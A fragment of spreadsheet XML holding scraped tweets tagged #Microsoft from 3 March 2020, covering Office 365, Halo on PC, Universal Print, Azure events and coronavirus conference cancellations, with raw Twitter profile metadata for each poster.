'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 19:00:01 +0000 2020</t>
  </si>
  <si>
    <t>My favorite book on all things Office 365! Continually updated with fresh content by MVPs Tony Redmond, Paul Robichaux, Brian Reid, Stale Hansen &amp;amp; more! https://t.co/MrEO1uSufG #Office365 #Microsoft #ITPro #SysAdmin #MicrosoftTeams #MSExchange https://t.co/sUocm5RwFR</t>
  </si>
  <si>
    <t>{'id': 2320005890, 'id_str': '2320005890', 'name': 'Gareth Gudger', 'screen_name': 'SuperTekBoy', 'location': 'USA', 'description': 'Microsoft MVP thwarting inferior email systems one server at a time | https://t.co/sYHFOi1jgQ | #MSExchange #Office365 #ITPro | Former Brit--now Mercan.', 'url': 'https://t.co/SGu5wL48Ph', 'entities': {'url': {'urls': [{'url': 'https://t.co/SGu5wL48Ph', 'expanded_url': 'http://www.supertekboy.com', 'display_url': 'supertekboy.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/sYHFOi1jgQ', 'expanded_url': 'http://SuperTekBoy.com', 'display_url': 'SuperTekBoy.com', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 1004, 'friends_count': 142, 'listed_count': 118, 'created_at': 'Fri Jan 31 01:31:23 +0000 2014', 'favourites_count': 8870, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6545, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0076A8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/966089704578920448/d3y1ri_Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/966089704578920448/d3y1ri_Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2320005890/1520571940', 'profile_link_color': '006490',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</si>
  <si>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18:59:10 +0000 2020</t>
  </si>
  <si>
    <t>Will #Apple, #Google and #Microsoft stay in #Russian #market?
https://t.co/lqY4ZfRX2e</t>
  </si>
  <si>
    <t>{'id': 277164345, 'id_str': '277164345', 'name': 'Ilya Kondrin', 'screen_name': 'kondrinmedia', 'location': 'Worldwide', 'description': 'Some interesting things about entertainment business, digital and copyright.\nAnd remember everything can be mutually', 'url': 'https://t.co/2hEKgPg0TX', 'entities': {'url': {'urls': [{'url': 'https://t.co/2hEKgPg0TX', 'expanded_url': 'https://www.dekuzu.com/en', 'display_url': 'dekuzu.com/en', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3862, 'friends_count': 3796, 'listed_count': 8, 'created_at': 'Mon Apr 04 20:40:32 +0000 2011', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9620,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'http://pbs.twimg.com/profile_images/1506395773/ILYA1_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1506395773/ILYA1_normal.JPG',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</si>
  <si>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18:58:26 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft Software Engineer Convicted of Fraud https://t.co/arPTs4SxPw 
#Microsoft #engineer #fraud</t>
  </si>
  <si>
    <t>Tue Mar 03 18:55:11 +0000 2020</t>
  </si>
  <si>
    <t>How to make and receive calls on your PC with the Your Phone app.
#android #pc #smartphone #windows10 #microsoft #microsoftwindows #windows #messages #androiddevelopers #apps #receive  #calls #windowsupdate https://t.co/q4GYrBi4Z6</t>
  </si>
  <si>
    <t>{'id': 1148987081806344193, 'id_str': '1148987081806344193', 'name': 'NetJagers', 'screen_name': 'JagersNet', 'location': '', 'description': 'Our Mission is to help educators so that they can inspire young learners. We want to open a school in underdeveloped areas where children get free education.', 'url': 'https://t.co/pigagb4UI9', 'entities': {'url': {'urls': [{'url': 'https://t.co/pigagb4UI9', 'expanded_url': 'http://www.netjagers.com', 'display_url': 'netjagers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 352, 'listed_count': 1, 'created_at': 'Wed Jul 10 16:07:22 +0000 2019', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 116,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'http://pbs.twimg.com/profile_images/1151903344027262977/zmurNWAd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151903344027262977/zmurNWAd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148987081806344193/1563470160',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</si>
  <si>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18:53:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts original Halo game is now available on PC https://t.co/8RsCNoBSji #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 18:51:20 +0000 2020</t>
  </si>
  <si>
    <t>Presenting at my second App in a Day!
Loads of individuals enthusiastic about the platform with so many Citizen Developers creating their first app it is amazing!
#powerapps #PowerPlatform #PowerAutomate #MicrosoftFlow #microsoft #appinaday #citizendeveloper #fidelityfactory https://t.co/eo5xJnz4Wl</t>
  </si>
  <si>
    <t>Tue Mar 03 18:48:53 +0000 2020</t>
  </si>
  <si>
    <t>How can I make 70usd in the next 10 hours. My Windows license expires tomorrow and money remain 70usd to complete.
#Windows10Pro 
#Microsoft 
#TuesdayMotivation 
#SuperTuesday
#Tuesdaythought
Nashville
#VoteForBernie</t>
  </si>
  <si>
    <t>{'id': 992934012, 'id_str': '992934012', 'name': 'Abduljaleel Adejumo(D-ESTIMATOR)', 'screen_name': 'jel__ade', 'location': '', 'description': 'Data Analyst || Entrepreneur || FB chatbot expert', 'url': 'https://t.co/ycriLaEHcL', 'entities': {'url': {'urls': [{'url': 'https://t.co/ycriLaEHcL', 'expanded_url': 'https://www.fiverr.com/jelade/do-regression-analysis-using-r-spss-and-stata?utm_campaign=base_gig_sh', 'display_url': 'fiverr.com/jelade/do-regrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 408, 'listed_count': 2, 'created_at': 'Thu Dec 06 12:07:51 +0000 2012', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/968501174956675073/Ff-gxB0K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968501174956675073/Ff-gxB0K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/992934012/1545031842',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</si>
  <si>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18:47:30 +0000 2020</t>
  </si>
  <si>
    <t>What a great turn out tonight! 
Lets talk #DevOps with @JoeHodkinson 
#naug #northernazureusergroup #Azure #Microsoft #AzureDevOps #Dev https://t.co/P8DVbBVO9G</t>
  </si>
  <si>
    <t>Tue Mar 03 18:47:09 +0000 2020</t>
  </si>
  <si>
    <t>How can I make 70usd in the next 10 hours. My Windows license expires tomorrow and money remain 70usd to complete.
#Windows10Pro 
#Microsoft 
#TuesdayMotivation 
#SuperTuesday
#Tuesdaythought</t>
  </si>
  <si>
    <t>Tue Mar 03 18:46:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft could show off Xbox Series X gameplay later this week #XboxSeriesX #AMD #Microsoft https://t.co/VS42fArtIW https://t.co/XwEP16fbne</t>
  </si>
  <si>
    <t>Tue Mar 03 18:45:20 +0000 2020</t>
  </si>
  <si>
    <t>AI Residency: Gaining skills in machine learning through mentorship and real-world applications https://t.co/2iuFFZyEsx &amp;lt;- Excellent program by #Microsoft; The #AI Residency is a 12-month program to train as research software engineers in either Redmond, WA or Cambridge, UK.</t>
  </si>
  <si>
    <t>{'id': 15357143, 'id_str': '15357143', 'name': 'LouisColumbus', 'screen_name': 'LouisColumbus', 'location': 'Placentia, CA USA', 'description': 'Husband &amp; Dad; Principal,IQMS/Dassault Systemes; Forbes Senior Contributor;Enterprise Irregular;love to teach, travel &amp; write;baseball fanatic', 'url': 'http://t.co/AsdPBeAOZ1', 'entities': {'url': {'urls': [{'url': 'http://t.co/AsdPBeAOZ1', 'expanded_url': 'http://www.linkedin.com/in/louiscolumbus', 'display_url': 'linkedin.com/in/louiscolumbâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28241, 'friends_count': 26486, 'listed_count': 1443, 'created_at': 'Tue Jul 08 19:32:41 +0000 2008', 'favourites_count': 24516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20767, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2A52BE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/956194764021313536/8XoASP2p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956194764021313536/8XoASP2p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15357143/1418234534', 'profile_link_color': '038EAB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'B7F7FB', 'profile_text_color': '000B33', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 18:41:37 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution by @msdev https://t.co/ffdFvqpA2I #microsoft via @DotNetKicks</t>
  </si>
  <si>
    <t>{'id': 66817619, 'id_str': '66817619', 'name': 'DotNetKicks', 'screen_name': 'dotnetkicks', 'location': '', 'description': 'http://t.co/6QKjAca2PL is a community based news site edited by our members specializing in .NET development techniques, technologies and tools.', 'url': 'http://t.co/0GoRXzD0RG', 'entities': {'url': {'urls': [{'url': 'http://t.co/0GoRXzD0RG', 'expanded_url': 'http://dotnetkicks.com/', 'display_url': 'dotnetkicks.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/6QKjAca2PL', 'expanded_url': 'http://DotNetKicks.com', 'display_url': 'DotNetKicks.com', 'indices': [0, 22]}]}}, 'protected': False, 'followers_count': 16734, 'friends_count': 5846, 'listed_count': 494, 'created_at': 'Tue Aug 18 22:06:55 +0000 2009', 'favourites_count': 11631, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 78382,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'http://pbs.twimg.com/profile_images/1125042797/dnk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125042797/dnk_normal.png',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</si>
  <si>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18:37:46 +0000 2020</t>
  </si>
  <si>
    <t>I'm surprised that #Microsoft even bothered to update the Groove app icon, considering that they pretty much left it to die https://t.co/aWfmRh82im</t>
  </si>
  <si>
    <t>{'id': 14662323, 'id_str': '14662323', 'name': 'Sombra is watching', 'screen_name': 'neko_designer', 'location': 'Behind you', 'description': 'Industrial Designer, Sombra Main, Happy console peasant. I speak taco. That rain cloud on a sunny day', 'url': 'https://t.co/n4MHKCCPEB', 'entities': {'url': {'urls': [{'url': 'https://t.co/n4MHKCCPEB', 'expanded_url': 'http://www.behance.net/neko_designer', 'display_url': 'behance.net/neko_designer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 278, 'friends_count': 482, 'listed_count': 10, 'created_at': 'Mon May 05 17:40:32 +0000 2008', 'favourites_count': 29912, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11268,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'http://pbs.twimg.com/profile_images/1047241988251123712/e5Df_UBR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047241988251123712/e5Df_UBR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14662323/1538516975',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</si>
  <si>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18:34:26 +0000 2020</t>
  </si>
  <si>
    <t>A #how2guide article on how to "Process #chatbot #telemetry via #AzureDataExplorer". With #reusable #code 
Topic:  #Azure #Data #Explorer #ADX #Kusto #Microsoft #botframework #dataexplorer #innovation #technology #Bigdata on #cloudcomputing 
#cloud https://t.co/PVTxQWoYeK</t>
  </si>
  <si>
    <t>{'id': 1060166186, 'id_str': '1060166186', 'name': 'Luca Vallarelli', 'screen_name': 'VallaLuca', 'location': '', 'description': 'Innovation hungry, tech passionate; sport addicted, music arranger; deeply believe in human relations.', 'url': 'https://t.co/Y5g2kUfYX3', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y5g2kUfYX3', 'expanded_url': 'http://aka.ms/luca', 'display_url': 'aka.ms/luca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 76, 'listed_count': 16, 'created_at': 'Fri Jan 04 11:04:57 +0000 2013', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 89, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B2DFDA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/890122482140803072/ZtNYP9jQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/890122482140803072/ZtNYP9jQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1060166186/1431703690', 'profile_link_color': '3B94D9',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</si>
  <si>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18:34:03 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus conference cancellations continue: Google and #Microsoft axe WSL and #Cloud Next https://t.co/Ma8UihYRkE via @Hybrid_Circle #Cisco #HPE https://t.co/Rx6OEAz5gj</t>
  </si>
  <si>
    <t>Tue Mar 03 18:32:02 +0000 2020</t>
  </si>
  <si>
    <t>The #cloud is more than just a different place to run your virtual machines
Keep learning at https://t.co/RNcXtC8lDC
#Microsoft #Azure #MSLearn #Coding #Developer</t>
  </si>
  <si>
    <t>{'id': 223021260, 'id_str': '223021260', 'name': 'Pablo Javier', 'screen_name': 'PabloJavier911', 'location': '', 'description': 'Microsoft #MVP, music lover who works with #SQLServer. I enjoy to teach, travel and help people taking advantage of databases. #SQL Trainer and speaker #MCT', 'url': 'https://t.co/DNiMnlWImU', 'entities': {'url': {'urls': [{'url': 'https://t.co/DNiMnlWImU', 'expanded_url': 'https://datoptim.com/author/pablojavier911/', 'display_url': 'datoptim.com/author/pablojaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 314, 'friends_count': 906, 'listed_count': 5, 'created_at': 'Sun Dec 05 04:21:13 +0000 2010', 'favourites_count': 1231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 868,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'http://pbs.twimg.com/profile_images/1024104201159364609/f3UUrrdR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024104201159364609/f3UUrrdR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/223021260/1533000298',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</si>
  <si>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18:31:35 +0000 2020</t>
  </si>
  <si>
    <t>I want to feel your cock moving inside me. #Grand Prairie   #microsoft #canon https://t.co/0rf4mHyb3i</t>
  </si>
  <si>
    <t>{'id': 1234874350060425217, 'id_str': '1234874350060425217', 'name': 'Lauren Miller', 'screen_name': 'skinkolinkho', 'location': 'Aurora, USA', 'description': 'Love is a fabric which never fades, no matter how often it is washed in the water of adversity and grief.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Tue Mar 03 16:12:47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'http://pbs.twimg.com/profile_images/1234877164270555140/t8_u342a_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234877164270555140/t8_u342a_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234874350060425217/1583252669',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</si>
  <si>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18:31:00 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/sUGEprh4LA #moderdesktop #Windows10 #PC #Gaming #Halo #Halo: The Master Chief Collection #Microsoft Store #PC Gaming #Steam #Windows 10 #Xbox Game Pass https://t.co/xCUgHR064H</t>
  </si>
  <si>
    <t>Tue Mar 03 18:30:53 +0000 2020</t>
  </si>
  <si>
    <t>Its been 6 Years since #Halo Guardians, eagerly awaiting #Fall2020 for release of 
#Halo Infinite 
#XBox #XBoxOneX #343Industries #XboxGameStudios #Microsoft https://t.co/KRwecL7nVh</t>
  </si>
  <si>
    <t>Tue Mar 03 18:29:10 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft Software Engineer Convicted of Fraud https://t.co/rgZHU4hJ8M 
#Microsoft #engineer #fraud</t>
  </si>
  <si>
    <t>Tue Mar 03 18:29:02 +0000 2020</t>
  </si>
  <si>
    <t>Surface stays on the sidelines: Microsoft and NFL expand tech partnership, add Teams tool to deal https://t.co/7GeLOdQHLg
via @geekwire #computing #microsoft https://t.co/Kd92YjLVQX</t>
  </si>
  <si>
    <t>Tue Mar 03 18:28:35 +0000 2020</t>
  </si>
  <si>
    <t>Someone from #Playstation could contact me that would be great but another reason y #Microsoft is far better in every way great customer service and overall care for their customers</t>
  </si>
  <si>
    <t>{'id': 320038100, 'id_str': '320038100', 'name': 'F4T4L EN1GM4', 'screen_name': 'F4T4L_EN1GM4', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 40, 'listed_count': 0, 'created_at': 'Sun Jun 19 05:44:24 +0000 2011', 'favourites_count': 73, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 223,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</si>
  <si>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Tue Mar 03 18:27:07 +0000 2020</t>
  </si>
  <si>
    <t>Halo: Combat Evolved Anniversary now available for PC with Halo: The Master Chief Collection https://t.co/N09NPcMkWh #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 18:25:01 +0000 2020</t>
  </si>
  <si>
    <t>Compelling work from home story during challenging times via #Microsoft #WFH  #microsoftteams https://t.co/FHhG68nFeH</t>
  </si>
  <si>
    <t>{'id': 14319523, 'id_str': '14319523', 'name': 'Jeff Willinger MSFT MVP â˜ï¸ #AIIM20', 'screen_name': 'jwillie', 'location': 'LA/SF/CHI/DEN/NYC MrWorldwide', 'description': 'Character w/character-digital transformation + workplace-speaker-socbiz-social media-SharePoint-CMO whisperer-AI-Machine Learning-Tri-26.2-unwavering force', 'url': 'https://t.co/nOi2FwCCXf', 'entities': {'url': {'urls': [{'url': 'https://t.co/nOi2FwCCXf', 'expanded_url': 'http://www.linkedin.com/in/jeffwillinger', 'display_url': 'linkedin.com/in/jeffwillingâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20472, 'friends_count': 13370, 'listed_count': 989, 'created_at': 'Mon Apr 07 02:32:58 +0000 2008', 'favourites_count': 8618, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 52755,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'http://pbs.twimg.com/profile_images/1136865637291028481/x6FUJGMk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136865637291028481/x6FUJGMk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14319523/1542316572',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</si>
  <si>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Tue Mar 03 18:25:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft just canceled two conferences ahead of their major ones https://t.co/SgaokY8ja1 #tech #SankalpIT</t>
  </si>
  <si>
    <t>Tue Mar 03 18:21:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft officially announces Universal Print, a cloud-based print server solution by @MSPowerUser https://t.co/afL9l0PW3t #microsoft via @DotNetKicks</t>
  </si>
  <si>
    <t>Tue Mar 03 18:20:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels conference over #coronavirus in #SanFrancisco.
Facebook too May 5-6 in #SanJose.
Be quiet about how much loot #Apple is losing.
The #BayArea is #tech world. People live in RV's and work for these companies.
#greed #sin #plague #fall
https://t.co/rCqfqADkPM</t>
  </si>
  <si>
    <t>{'id': 96901369, 'id_str': '96901369', 'name': 'Ã¤riel Ã¤dkins ðŸ’œðŸ’šðŸ’™ðŸ§¡â¤ï¸', 'screen_name': 'arieladkins', 'location': 'San Francisco, CA', 'description': 'The #Creator God is not a man, but a Ghost and Holy #LORD.  arieladkins@gmail.com ðŸŽ§ðŸŽ¼ðŸŽ¹100% Albanian from Bronx NY, Queens, Spanish Harlem, San Francisco.', 'url': 'https://t.co/itM4AaFL0b', 'entities': {'url': {'urls': [{'url': 'https://t.co/itM4AaFL0b', 'expanded_url': 'https://www.facebook.com/aarieladkins', 'display_url': 'facebook.com/aarieladkins', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 70, 'friends_count': 75, 'listed_count': 7, 'created_at': 'Tue Dec 15 03:13:14 +0000 2009', 'favourites_count': 2667, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3283, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4A913C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229525255774851073/bhzefv-S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229525255774851073/bhzefv-S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96901369/1581976600',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</si>
  <si>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18:19:39 +0000 2020</t>
  </si>
  <si>
    <t>My most recent addition to my xbox collection - This amazing and Rare #Projectgothamracing2 Radio Control car. Im new to twitter and all my collection is on Instagram @Gamebox_ukv go check us out 
#xbox #Microsoft #LimitedEdition #pgr2 #projectgotham https://t.co/sqYYfaGZ2K</t>
  </si>
  <si>
    <t>{'id': 1221401627426508800, 'id_str': '1221401627426508800', 'name': 'gamebox_ukv', 'screen_name': 'GameboxUkv', 'location': 'North West, England', 'description': 'ðŸ‡¬ðŸ‡§ UK Original âŽbox Collector &amp; Halo Fan', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 60, 'listed_count': 0, 'created_at': 'Sun Jan 26 11:57:12 +0000 2020', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1221401905970151425/LdTdz5Ca_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221401905970151425/LdTdz5Ca_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1221401627426508800/1580198313',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</si>
  <si>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18:16:36 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, KAMIND IT delivers the data, security and AI you need to build an agile data estate. https://t.co/isLJ6wUCnv</t>
  </si>
  <si>
    <t>{'id': 82786856, 'id_str': '82786856', 'name': 'KAMIND IT', 'screen_name': 'kamindit', 'location': 'PDX / Lake Oswego  , OR', 'description': 'Assisting Organizations to Utilize Technology to Drive Innovation', 'url': 'http://t.co/LECSkBtWB4', 'entities': {'url': {'urls': [{'url': 'http://t.co/LECSkBtWB4', 'expanded_url': 'http://www.kamind.com', 'display_url': 'kamind.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 432, 'listed_count': 11, 'created_at': 'Fri Oct 16 03:25:28 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1121,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'http://pbs.twimg.com/profile_images/1110205012762755072/l3RxOxVs_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110205012762755072/l3RxOxVs_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/82786856/1553528279',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</si>
  <si>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Tue Mar 03 18:15:39 +0000 2020</t>
  </si>
  <si>
    <t>Tired of being chained to your desk? Want to brush up on your digital skills? Check out this article to learn how you can #workremotely with help from #communication apps and tools. What are you waiting for? Get #Teamworksolutions from #Microsoft. https://t.co/NWRXKmMfAD</t>
  </si>
  <si>
    <t>{'id': 367892933, 'id_str': '367892933', 'name': 'John Schmelzeis', 'screen_name': 'johnschmsft', 'location': 'Phoenix, AZ', 'description': 'Director Partner Development, One Commercial Partner', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Sun Sep 04 18:54:56 +0000 2011', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 158,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'http://pbs.twimg.com/profile_images/814970841964290048/8QLZZdrT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/814970841964290048/8QLZZdrT_normal.jpg',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</si>
  <si>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18:15:01 +0000 2020</t>
  </si>
  <si>
    <t>Don't discount third-party alternatives when searching for the right VM monitoring tool. Though #Microsoft and #VMware offer strong candidates, third-party options can offer improved cost savings and integrations. https://t.co/0epyFI0JoK</t>
  </si>
  <si>
    <t>{'id': 14342408, 'id_str': '14342408', 'name': 'SearchServerVirt', 'screen_name': 'ServerVirt_TT', 'location': 'Newton, Mass.', 'description': 'SearchServerVirtualization is @TechTargetâ€™s virtualization resource, covering management and backup strategies, hypervisor evaluations and more.', 'url': 'https://t.co/luFTCx20V4', 'entities': {'url': {'urls': [{'url': 'https://t.co/luFTCx20V4', 'expanded_url': 'https://searchservervirtualization.techtarget.com/', 'display_url': 'â€¦chservervirtualization.techtarget.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3025, 'friends_count': 900, 'listed_count': 231, 'created_at': 'Wed Apr 09 15:09:35 +0000 2008', 'favourites_count': 663, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10797, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CCCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/941368380099121153/Ay0HuL1y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941368380099121153/Ay0HuL1y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14342408/1513274714', 'profile_link_color': '00B3AD',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</si>
  <si>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18:14:57 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger of Microsoft discusses how to better value diversity in the workforce.
https://t.co/4fYw8nVdYC
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #diversity #datascience https://t.co/RsZKoeWxu1</t>
  </si>
  <si>
    <t>{'id': 15058596, 'id_str': '15058596', 'name': 'theCUBE', 'screen_name': 'theCUBE', 'location': 'Silicon Valley, CA', 'description': 'Welcome to theCUBE! \nFollow @theCUBE for unparalleled first person insight. Extracting the signal from the noise since 2010.', 'url': 'https://t.co/QpL9tE2Bxr', 'entities': {'url': {'urls': [{'url': 'https://t.co/QpL9tE2Bxr', 'expanded_url': 'http://www.theCUBE.net', 'display_url': 'theCUBE.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13932, 'friends_count': 5604, 'listed_count': 841, 'created_at': 'Mon Jun 09 14:01:57 +0000 2008', 'favourites_count': 50515, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77311,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'http://pbs.twimg.com/profile_images/1014757286227505153/Ib4sonCS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1014757286227505153/Ib4sonCS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15058596/1541459517',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</si>
  <si>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18:14:00 +0000 2020</t>
  </si>
  <si>
    <t>In this infographic, learn how AI and tools like #Microsoft #BusinessIntelligence can help drive better marketing decisions and guide your business to greater growth. https://t.co/ljEx9ZpumS</t>
  </si>
  <si>
    <t>Tue Mar 03 18:13:44 +0000 2020</t>
  </si>
  <si>
    <t>Empowering the NFL with Microsoft Surface and Microsoft Teams #Microsoft  https://t.co/QQtjulesDG</t>
  </si>
  <si>
    <t>Tue Mar 03 18:11:24 +0000 2020</t>
  </si>
  <si>
    <t>@FF_XIV_EN any news on the alleged Xbox release? Even a coming soon will suffice. #XboxOne #XboxLive #Microsoft</t>
  </si>
  <si>
